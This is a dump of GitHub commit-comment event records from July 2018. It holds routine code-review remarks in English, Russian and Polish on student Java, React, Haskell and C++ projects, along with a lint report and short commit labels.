{"id":"8000379051","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792900,"position":203,"line":65,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:16:31Z","updated_at":"2018-07-22T15:16:31Z","author_association":"NONE","body":"This is the only exception to the this.displayFunction call.  You could instead add a \"return\" after the alert, which will exit the function."}},"created_at":"2018-07-22T15:16:31Z"}
{"id":"8000380329","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792901,"position":27,"line":27,"path":"src/lesson4/Task3.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:17:22Z","updated_at":"2018-07-22T15:17:22Z","author_association":"NONE","body":"как-то сложно очень решено и не верно"}},"created_at":"2018-07-22T15:17:22Z"}
{"id":"8000380860","type":"CommitCommentEvent","actor":{"login":"Kayle7777"},"repo":{"name":"PROJECT-1-HACKERS/Project-1-BootCamp"},"payload":{"comment":{"id":29792902,"position":null,"line":null,"path":null,"commit_id":"c14b11d3f9c2fcedc2bc0117ad70d7f7561431a0","created_at":"2018-07-22T15:17:45Z","updated_at":"2018-07-22T15:17:45Z","author_association":"CONTRIBUTOR","body":"hahaha, yeah i was maaaaad\n\nOn Sat, Jul 21, 2018 at 3:15 PM, Corey Mitchell <notifications@github.com>\nwrote:\n\n> This is the greatest commit message I've ever seen LOL\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/PROJECT-1-HACKERS/Project-1-BootCamp/commit/c14b11d3f9c2fcedc2bc0117ad70d7f7561431a0#commitcomment-29789823>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT6ZnVxzS0vfspkBLSMdnYysVQdzUi9Rks5uI4v0gaJpZM4VZv71>\n> .\n>\n"}},"created_at":"2018-07-22T15:17:45Z"}
{"id":"8000382461","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792906,"position":41,"line":41,"path":"src/lesson4/Task3.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:18:50Z","updated_at":"2018-07-22T15:18:50Z","author_association":"NONE","body":"не за чем оставлять столько пустых строчек в классе"}},"created_at":"2018-07-22T15:18:50Z"}
{"id":"8000382527","type":"CommitCommentEvent","actor":{"login":"Fightg"},"repo":{"name":"Fightg/Htg.github.io"},"payload":{"comment":{"id":29792907,"position":9,"line":9,"path":"index.md","commit_id":"ba1434b12b2dd2c2edc3bcb15ebcd93da9668c12","created_at":"2018-07-22T15:18:53Z","updated_at":"2018-07-22T15:18:53Z","author_association":"OWNER","body":"asdfasdf"}},"created_at":"2018-07-22T15:18:53Z"}
{"id":"8000382765","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792908,"position":null,"line":null,"path":null,"commit_id":"cc4dd3e11b7a1c1f006d8c408d5300c861ee907c","created_at":"2018-07-22T15:19:01Z","updated_at":"2018-07-22T15:19:01Z","author_association":"OWNER","body":"commit rejestracja"}},"created_at":"2018-07-22T15:19:01Z"}
{"id":"8000383844","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792909,"position":18,"line":18,"path":"src/lesson4/Task4.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:19:43Z","updated_at":"2018-07-22T15:19:43Z","author_association":"NONE","body":"лучше давать нормальные имена переменным, а не просто i"}},"created_at":"2018-07-22T15:19:43Z"}
{"id":"8000384507","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792910,"position":27,"line":27,"path":"src/lesson4/Task4.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:20:07Z","updated_at":"2018-07-22T15:20:07Z","author_association":"NONE","body":"не надо выводов в консоль в основном алгоритме"}},"created_at":"2018-07-22T15:20:07Z"}
{"id":"8000384838","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792911,"position":null,"line":null,"path":null,"commit_id":"cc4dd3e11b7a1c1f006d8c408d5300c861ee907c","created_at":"2018-07-22T15:20:17Z","updated_at":"2018-07-22T15:20:17Z","author_association":"OWNER","body":"commit skypt"}},"created_at":"2018-07-22T15:20:17Z"}
{"id":"8000385023","type":"CommitCommentEvent","actor":{"login":"Speyd3r"},"repo":{"name":"Speyd3r/MeekPlush-Bot"},"payload":{"comment":{"id":29792912,"position":null,"line":null,"path":null,"commit_id":"ef405f78f8d4e7a4dd82c051512428e7601e7675","created_at":"2018-07-22T15:20:25Z","updated_at":"2018-07-22T15:20:25Z","author_association":"OWNER","body":"hecc i pushed the token and my NND login data 2 times, nobody saw anything uwu"}},"created_at":"2018-07-22T15:20:25Z"}
{"id":"8000385390","type":"CommitCommentEvent","actor":{"login":"JitenKumar"},"repo":{"name":"JitenKumar/MyResume"},"payload":{"comment":{"id":29792913,"position":null,"line":null,"path":null,"commit_id":"48d14fcee45759da89c2bdee36d0d1f51122d271","created_at":"2018-07-22T15:20:39Z","updated_at":"2018-07-22T15:20:39Z","author_association":"OWNER","body":"Resume "}},"created_at":"2018-07-22T15:20:39Z"}
{"id":"8000386391","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792915,"position":null,"line":null,"path":null,"commit_id":"cc4dd3e11b7a1c1f006d8c408d5300c861ee907c","created_at":"2018-07-22T15:21:16Z","updated_at":"2018-07-22T15:21:16Z","author_association":"OWNER","body":"commit skrypty"}},"created_at":"2018-07-22T15:21:16Z"}
{"id":"8000398530","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792960,"position":null,"line":null,"path":null,"commit_id":"61415065ee739ff052330cdb2a355e3a94e03508","created_at":"2018-07-22T15:29:17Z","updated_at":"2018-07-22T15:29:17Z","author_association":"OWNER","body":"commit endecken"}},"created_at":"2018-07-22T15:29:17Z"}
{"id":"8000399192","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792961,"position":null,"line":null,"path":null,"commit_id":"73f9162de858753b9d42d0070256f1fbc2a40dcd","created_at":"2018-07-22T15:29:43Z","updated_at":"2018-07-22T15:29:43Z","author_association":"OWNER","body":"commit forum"}},"created_at":"2018-07-22T15:29:43Z"}
{"id":"8000399469","type":"CommitCommentEvent","actor":{"login":"orelkan"},"repo":{"name":"TechnionTDK/jbs-text2json"},"payload":{"comment":{"id":29792962,"position":null,"line":null,"path":null,"commit_id":"eb14d2d33825e5b1e167a96c71acbcb9fa914eff","created_at":"2018-07-22T15:29:55Z","updated_at":"2018-07-22T15:29:55Z","author_association":"CONTRIBUTOR","body":"Total time of work: \r\n3 hours"}},"created_at":"2018-07-22T15:29:55Z"}
{"id":"8000400184","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792966,"position":null,"line":null,"path":null,"commit_id":"8849b235f77eb72cecbca97452ee8f4c3a6e1bee","created_at":"2018-07-22T15:30:18Z","updated_at":"2018-07-22T15:30:18Z","author_association":"OWNER","body":"commit licencja"}},"created_at":"2018-07-22T15:30:18Z"}
{"id":"8000401117","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792968,"position":null,"line":null,"path":null,"commit_id":"7a29b598500a73d0091bda6b411cd7269d5de90c","created_at":"2018-07-22T15:30:53Z","updated_at":"2018-07-22T15:30:53Z","author_association":"OWNER","body":"I think I understand the reasoning behind removing `find'`. But not so much about the 2 glassbr lines from the Makefile."}},"created_at":"2018-07-22T15:30:53Z"}
{"id":"8000401437","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792969,"position":null,"line":null,"path":null,"commit_id":"5edb1c2b705cc5e76c0a582186217900b79e4158","created_at":"2018-07-22T15:31:05Z","updated_at":"2018-07-22T15:31:05Z","author_association":"OWNER","body":"commit mitteilungen"}},"created_at":"2018-07-22T15:31:05Z"}
{"id":"8000401487","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792970,"position":31,"line":31,"path":"src/lesson6/Point.java","commit_id":"ed037442ddf59895921145f3308067a5fa583f1e","created_at":"2018-07-22T15:31:07Z","updated_at":"2018-07-22T15:31:07Z","author_association":"NONE","body":"не правильная формула"}},"created_at":"2018-07-22T15:31:07Z"}
{"id":"8000402026","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792971,"position":null,"line":null,"path":null,"commit_id":"581b48a90cee885b8a0c5fb2fc1cd7427ebc000c","created_at":"2018-07-22T15:31:26Z","updated_at":"2018-07-22T15:31:26Z","author_association":"OWNER","body":"Ah, I see, it was a temporary thing from some reason that is no longer relevant!"}},"created_at":"2018-07-22T15:31:26Z"}
{"id":"8000402495","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792977,"position":null,"line":null,"path":null,"commit_id":"13396a30afb2712f65e32bcadeeba828f157e4f1","created_at":"2018-07-22T15:31:44Z","updated_at":"2018-07-22T15:31:44Z","author_association":"OWNER","body":"commit Photolio"}},"created_at":"2018-07-22T15:31:44Z"}
{"id":"8000403053","type":"CommitCommentEvent","actor":{"login":"koksnuss"},"repo":{"name":"koksnuss/fabsetup"},"payload":{"comment":{"id":29792978,"position":null,"line":null,"path":null,"commit_id":"4d6d4a515f3f35d34fa02670ee191049f022e8dc","created_at":"2018-07-22T15:32:06Z","updated_at":"2018-07-22T15:32:06Z","author_association":"OWNER","body":"#4d6d4a515f3f35d34fa02670ee191049f022e8dc"}},"created_at":"2018-07-22T15:32:06Z"}
{"id":"8000403093","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792979,"position":null,"line":null,"path":null,"commit_id":"48ab6eb135c255ed4e72c0dc3fda7011eae04480","created_at":"2018-07-22T15:32:08Z","updated_at":"2018-07-22T15:32:08Z","author_association":"OWNER","body":"commit praca"}},"created_at":"2018-07-22T15:32:08Z"}
{"id":"8000403964","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792980,"position":null,"line":null,"path":null,"commit_id":"4e907fb0776b334f7c79186d97a4ab5ac4a79ec5","created_at":"2018-07-22T15:32:41Z","updated_at":"2018-07-22T15:32:41Z","author_association":"OWNER","body":"commit regolamin"}},"created_at":"2018-07-22T15:32:41Z"}
{"id":"8000404610","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792981,"position":null,"line":null,"path":null,"commit_id":"1eacafb7bfb2881809286821a29d8c68b9d80985","created_at":"2018-07-22T15:33:08Z","updated_at":"2018-07-22T15:33:08Z","author_association":"OWNER","body":"commit retwet"}},"created_at":"2018-07-22T15:33:08Z"}
{"id":"8000405197","type":"CommitCommentEvent","actor":{"login":"koksnuss"},"repo":{"name":"koksnuss/fabsetup"},"payload":{"comment":{"id":29792982,"position":null,"line":null,"path":null,"commit_id":"4d6d4a515f3f35d34fa02670ee191049f022e8dc","created_at":"2018-07-22T15:33:32Z","updated_at":"2018-07-22T15:33:32Z","author_association":"OWNER","body":"4d6d4a515f3f35d34fa02670ee191049f022e8dc"}},"created_at":"2018-07-22T15:33:32Z"}
{"id":"8000405364","type":"CommitCommentEvent","actor":{"login":"HTomJMW"},"repo":{"name":"zerty/Benny-Edition-CTI-0.97-Zerty-Modification"},"payload":{"comment":{"id":29792983,"position":null,"line":null,"path":null,"commit_id":"4d2ec17b7fd960878e31518803be02e68fc66b25","created_at":"2018-07-22T15:33:39Z","updated_at":"2018-07-22T15:33:39Z","author_association":"COLLABORATOR","body":"sry fsm not like EOL thing...\r\nonly start, create and cleanup boxes changed bit"}},"created_at":"2018-07-22T15:33:39Z"}
{"id":"8000405519","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792984,"position":null,"line":null,"path":null,"commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:33:45Z","updated_at":"2018-07-22T15:33:45Z","author_association":"NONE","body":"Overall this looks pretty good.  The code is pretty easy to read and I don't see a lot of opportunities for improvement.  I've added some comments inline against the commit for minor things.\r\n\r\nYou should be proud of yourself not just for completing this in a timely fashion, but for doing so with React/Webpack.  You've shown a lot of great learning here."}},"created_at":"2018-07-22T15:33:45Z"}
{"id":"8000405693","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792985,"position":null,"line":null,"path":null,"commit_id":"0edce12534be4d2a9ccad63782ba9359a3cc30b0","created_at":"2018-07-22T15:33:52Z","updated_at":"2018-07-22T15:33:52Z","author_association":"OWNER","body":"commit web.conf."}},"created_at":"2018-07-22T15:33:52Z"}
{"id":"8000406077","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29792986,"position":3,"line":3,"path":"Lesson4HW/Task1.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:34:06Z","updated_at":"2018-07-22T15:34:06Z","author_association":"NONE","body":"отступ между классом и функцией, а также между функциями"}},"created_at":"2018-07-22T15:34:06Z"}
{"id":"8000406195","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792987,"position":203,"line":65,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:34:10Z","updated_at":"2018-07-22T15:34:10Z","author_association":"NONE","body":"Like so:\r\n```javascript\r\ncalculate = () => {\r\n    let op1 = parseFloat(this.acc);\r\n    let op2 = parseFloat(this.currentNumber);\r\n\r\n    switch (this.operator) {\r\n      case 'add':\r\n        this.result = op1 + op2;\r\n        break;\r\n      case 'sub':\r\n        this.result = op1 - op2;\r\n        break;\r\n      case 'multi':\r\n        this.result = Math.round(10000 * op1 * op2) / 10000\r\n        break;\r\n      case 'div':\r\n        this.result = Math.round(10000 * op1 / op2) / 10000\r\n        break;\r\n      case 'mod':\r\n        this.result = op1 % op2\r\n        break;\r\n      default:\r\n        alert(\"Invalid Op '\" + this.operator + \"'\")\r\n        return;\r\n    }\r\n\r\n    this.displayFunction(this.result);\r\n    this.acc = '';                //clears the second number\r\n    this.currentNumber = this.result    // ***important keeps running total of calcuations\r\n  }\r\n```"}},"created_at":"2018-07-22T15:34:10Z"}
{"id":"8000406488","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792989,"position":null,"line":null,"path":null,"commit_id":"06b1f3d636fb2c20c11ceb5f744eaf4aa8a62b5b","created_at":"2018-07-22T15:34:21Z","updated_at":"2018-07-22T15:34:21Z","author_association":"OWNER","body":"commit zdjecia"}},"created_at":"2018-07-22T15:34:21Z"}
{"id":"8000406711","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29792990,"position":15,"line":15,"path":"Lesson4HW/Task1.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:34:29Z","updated_at":"2018-07-22T15:34:29Z","author_association":"NONE","body":"давать нормальные названия переменным"}},"created_at":"2018-07-22T15:34:29Z"}
{"id":"8000406720","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29792991,"position":30,"line":177,"path":"AI/VCAI/ResourceManager.cpp","commit_id":"e79478466dd23a05b319abd3caaee3d4554d3be2","created_at":"2018-07-22T15:34:29Z","updated_at":"2018-07-22T15:34:29Z","author_association":"MEMBER","body":"We still use c++11 std, remember about it when we switch to c++17"}},"created_at":"2018-07-22T15:34:29Z"}
{"id":"8000407401","type":"CommitCommentEvent","actor":{"login":"sco1"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29792992,"position":3,"line":1,"path":"uichoose.m","commit_id":"604d841860fb777ca339937e2b6494d36313d52c","created_at":"2018-07-22T15:34:58Z","updated_at":"2018-07-22T15:34:58Z","author_association":"MEMBER","body":"I was planning on swapping the outputs, I was just copying existing syntax without thinking too much about it. I get that having the file name first with `uigetfile` makes sense in its context, but it's always messed with my brain a bit having the file name before the path name.\r\n\r\nIn the multiselect case, you can actually select files *and* directories, so the assumption that the path is homogeneous isn't necessarily correct. I haven't decided if I want to respect the behavior, since it's nice to allow for the selection of multiple directories, or just ignore it and throw a warning. I'm leaning towards the former, though having a `ScalarPath` option would be a nice complement to the latter."}},"created_at":"2018-07-22T15:34:58Z"}
{"id":"8000407557","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792993,"position":null,"line":null,"path":null,"commit_id":"f223e1c1397605394896f294bc3eb89cf7486514","created_at":"2018-07-22T15:35:04Z","updated_at":"2018-07-22T15:35:04Z","author_association":"OWNER","body":"commit layout"}},"created_at":"2018-07-22T15:35:04Z"}
{"id":"8000408077","type":"CommitCommentEvent","actor":{"login":"dydzio0614"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29792994,"position":30,"line":177,"path":"AI/VCAI/ResourceManager.cpp","commit_id":"e79478466dd23a05b319abd3caaee3d4554d3be2","created_at":"2018-07-22T15:35:24Z","updated_at":"2018-07-22T15:35:24Z","author_association":"MEMBER","body":"isn't std::find_if part of c++11?"}},"created_at":"2018-07-22T15:35:24Z"}
{"id":"8000408594","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792995,"position":null,"line":null,"path":null,"commit_id":"cc3a270c99c276012d62449653fd1abce8240f9b","created_at":"2018-07-22T15:35:45Z","updated_at":"2018-07-22T15:35:45Z","author_association":"OWNER","body":"commit jekyll"}},"created_at":"2018-07-22T15:35:45Z"}
{"id":"8000408598","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792996,"position":4,"line":72,"path":"code/drasil-example/Drasil/GamePhysics/Body.hs","commit_id":"e7f75cae299266fd62481d407ad8822505a5b75b","created_at":"2018-07-22T15:35:45Z","updated_at":"2018-07-22T15:35:45Z","author_association":"OWNER","body":"This function is `maybeToList` from `Data.Maybe`."}},"created_at":"2018-07-22T15:35:45Z"}
{"id":"8000409709","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792997,"position":null,"line":null,"path":null,"commit_id":"1129cc757d1e13f1214f5231d9290872284f1e54","created_at":"2018-07-22T15:36:30Z","updated_at":"2018-07-22T15:36:30Z","author_association":"OWNER","body":"commit str.dla uz."}},"created_at":"2018-07-22T15:36:30Z"}
{"id":"8000409713","type":"CommitCommentEvent","actor":{"login":"flyize"},"repo":{"name":"samyun/southwest-price-drop-bot"},"payload":{"comment":{"id":29792998,"position":null,"line":null,"path":null,"commit_id":"6c877dad092fa3dada217a09fc45fa0e884417f2","created_at":"2018-07-22T15:36:31Z","updated_at":"2018-07-22T15:36:31Z","author_association":"NONE","body":"Proxy support is awesome!  Any easy way to add proxy authentication?"}},"created_at":"2018-07-22T15:36:31Z"}
{"id":"8000409951","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29792999,"position":10,"line":10,"path":"Lesson4HW/Task1.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:36:41Z","updated_at":"2018-07-22T15:36:41Z","author_association":"NONE","body":"сложное условие, надо упростить. Как минимум оно срабатывает один раз, следовательно нечего его выносить в самый верх алгоритма"}},"created_at":"2018-07-22T15:36:41Z"}
{"id":"8000410276","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793000,"position":8,"line":8,"path":"Lesson4HW/Task2.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:36:57Z","updated_at":"2018-07-22T15:36:57Z","author_association":"NONE","body":"для вывода массива используй Arrays.toString"}},"created_at":"2018-07-22T15:36:57Z"}
{"id":"8000410347","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29793001,"position":null,"line":null,"path":null,"commit_id":"d9002aaed51c6d17445d62a4efcd0225491e36f4","created_at":"2018-07-22T15:36:59Z","updated_at":"2018-07-22T15:36:59Z","author_association":"OWNER","body":"commit str.po wyl."}},"created_at":"2018-07-22T15:36:59Z"}
{"id":"8000410483","type":"CommitCommentEvent","actor":{"login":"mapkyca"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29793002,"position":null,"line":null,"path":null,"commit_id":"d237f4b097071e1496128acec8d04402ea5f90ef","created_at":"2018-07-22T15:37:05Z","updated_at":"2018-07-22T15:37:05Z","author_association":"COLLABORATOR","body":"Would a compromise be to only proxy non-local urls? ... kinda need this functionality for something."}},"created_at":"2018-07-22T15:37:05Z"}
{"id":"8000410530","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29793003,"position":12,"line":110,"path":"code/drasil-example/Drasil/GlassBR/Body.hs","commit_id":"e7f75cae299266fd62481d407ad8822505a5b75b","created_at":"2018-07-22T15:37:07Z","updated_at":"2018-07-22T15:37:07Z","author_association":"OWNER","body":"Comment on the 5 lines above: you should never just cut-and-paste code like that. If it is duplicate, it should be put into a common function."}},"created_at":"2018-07-22T15:37:07Z"}
{"id":"8000411099","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793004,"position":36,"line":36,"path":"Lesson4HW/Task2.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:37:28Z","updated_at":"2018-07-22T15:37:28Z","author_association":"NONE","body":"почему не выносим в отдельную функцию алгоритм? В мейне только тестируем"}},"created_at":"2018-07-22T15:37:28Z"}
{"id":"8000411398","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793005,"position":218,"line":80,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:37:42Z","updated_at":"2018-07-22T15:37:42Z","author_association":"NONE","body":"Don't need to apologize.  The logic is as long as it needs to be.  The apology is writing it cleanly and readably."}},"created_at":"2018-07-22T15:37:42Z"}
{"id":"8000411619","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793006,"position":16,"line":16,"path":"Lesson4HW/Task1.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:37:51Z","updated_at":"2018-07-22T15:37:51Z","author_association":"NONE","body":"main только для тестирования, выносим алгоритмы в отдельные функции"}},"created_at":"2018-07-22T15:37:51Z"}
{"id":"8000411811","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793009,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T15:38:02Z","updated_at":"2018-07-22T15:38:02Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97//Users/tarek/AndroidStudioProjects/emptyapp/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:38:02Z"}
{"id":"8000411835","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29793010,"position":null,"line":null,"path":null,"commit_id":"0edce12534be4d2a9ccad63782ba9359a3cc30b0","created_at":"2018-07-22T15:38:03Z","updated_at":"2018-07-22T15:38:03Z","author_association":"OWNER","body":"commit str.glownej"}},"created_at":"2018-07-22T15:38:03Z"}
{"id":"8000411977","type":"CommitCommentEvent","actor":{"login":"mapkyca"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29793011,"position":null,"line":null,"path":null,"commit_id":"d237f4b097071e1496128acec8d04402ea5f90ef","created_at":"2018-07-22T15:38:10Z","updated_at":"2018-07-22T15:38:10Z","author_association":"COLLABORATOR","body":"Commit message doesn't give details as to _why_ this was removed"}},"created_at":"2018-07-22T15:38:10Z"}
{"id":"8000412085","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29793012,"position":217,"line":79,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:38:14Z","updated_at":"2018-07-22T15:38:14Z","author_association":"NONE","body":"Don't add additional commentary \"all this logic does is say\".  Just the facts, ma'am, just the facts."}},"created_at":"2018-07-22T15:38:14Z"}
{"id":"8000413583","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29793015,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T15:39:18Z","updated_at":"2018-07-22T15:39:18Z","author_association":"OWNER","body":"It's all good. I'm just trying to make bug fixes as visible as possible."}},"created_at":"2018-07-22T15:39:18Z"}
{"id":"8000413602","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29793016,"position":32,"line":32,"path":"Lesson4HW/Task2.java","commit_id":"00907c7fc27f093f58bd7cbb950e3f8208408fd5","created_at":"2018-07-22T15:39:18Z","updated_at":"2018-07-22T15:39:18Z","author_association":"NONE","body":"тебе нужно было лишь удалить повторяющиеся значения, а ты полностью изменил структуру массива из-за сортировки, хоть это и оптимальнее решение"}},"created_at":"2018-07-22T15:39:18Z"}
